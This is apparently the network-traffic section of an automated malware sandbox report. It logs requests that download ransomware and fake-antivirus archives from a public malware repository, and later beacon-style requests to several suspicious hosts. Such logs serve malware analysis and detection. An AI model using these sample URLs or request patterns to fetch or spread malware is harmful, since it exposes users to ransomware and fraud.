          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1Host: github.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Birele.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Cerber%205.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Cerber%205.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/DeriaLock.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Fantom.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Fantom.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/InfinityCrypt.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/InfinityCrypt.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Krotten.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Krotten.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/NoMoreRansom.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Petya.A.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Petya.A.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/PolyRansom.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/PolyRansom.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Winlocker.VB6.Blacksod.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Winlocker.VB6.Blacksod.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/ViraLock.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/ViraLock.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/WannaCrypt0r.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/WannaCrypt0r.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Xyeta.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Xyeta.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Antivirus.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Platinum.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Antivirus%20Platinum.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Pro%202017.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Antivirus%20Pro%202017.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/AnViPC2009.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/AnViPC2009.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/FakeAdwCleaner.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/FakeAdwCleaner.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Happy%20Antivirus.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Happy%20Antivirus.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/InternetSecurityGuard.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/InternetSecurityGuard.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Live%20Protection%20Suite%202019.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Live%20Protection%20Suite%202019.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Movie.mpeg.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Movie.mpeg.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/NavaShield.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/NavaShield.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/PC%20Defender.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/PC%20Defender.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/PC%20Defender%20v2.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/PC%20Defender%20v2.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/RegistrySmart.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/RegistrySmart.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Security%20Central.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Security%20Central.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Security%20Defender.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Security%20Defender.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Security%20Defender%202015.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Security%20Defender%202015.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/SE2011.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/SE2011.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/SecurityScanner.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/SecurityScanner.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/SmartDefragmenter.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/SmartDefragmenter.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/VAV2008.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/VAV2008.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Win7Recover.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1Host: github.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Birele.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /1001 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: yandex.ruCookie: _yasc=WOxcuHWRth/MOesDrBOKQ05cqblg3Pr6HOsR8h6u0sZy4aMO; is_gdpr_b=CPe0cBDfjAEYAQ==; is_gdpr=1
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1Host: github.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1Host: github.com
          Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Birele.zip HTTP/1.1Host: raw.githubusercontent.com
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /scripts/new_install.php?owner=6AdwCleaner HTTP/1.1Host: www.vikingwebscanner.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /da69ebd6-6db-4dfd-92f8-75ac195546d7 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /1001 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: yandex.ru
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /sw/l.php?aff_id=1&wm_id=46&u=c8a78e4e-2f23-4533-80a0-a72fb7908116&log_id=16&os=6.2.9200.256.1.9. HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 78.159.97.210Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/UNLOCKKEYS/LOGON.exe HTTP/1.1Host: arizonacode.bplaced.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /da69ebd6-6db-4dfd-92f8-75ac195546d7 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /da69ebd6-6db-4dfd-92f8-75ac195546d7 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /da69ebd6-6db-4dfd-92f8-75ac195546d7 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /da69ebd6-6db-4dfd-92f8-75ac195546d7 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /da69ebd6-6db-4dfd-92f8-75ac195546d7 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /scripts/status.php?action=renew&id=0 HTTP/1.1Host: www.vikingwebscanner.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/UNLOCKKEYS/LOGON.exe HTTP/1.1Host: arizonacode.bplaced.netConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /da69ebd6-6db-4dfd-92f8-75ac195546d7 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /da69ebd6-6db-4dfd-92f8-75ac195546d7 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /da69ebd6-6db-4dfd-92f8-75ac195546d7 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /da69ebd6-6db-4dfd-92f8-75ac195546d7 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /da69ebd6-6db-4dfd-92f8-75ac195546d7 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
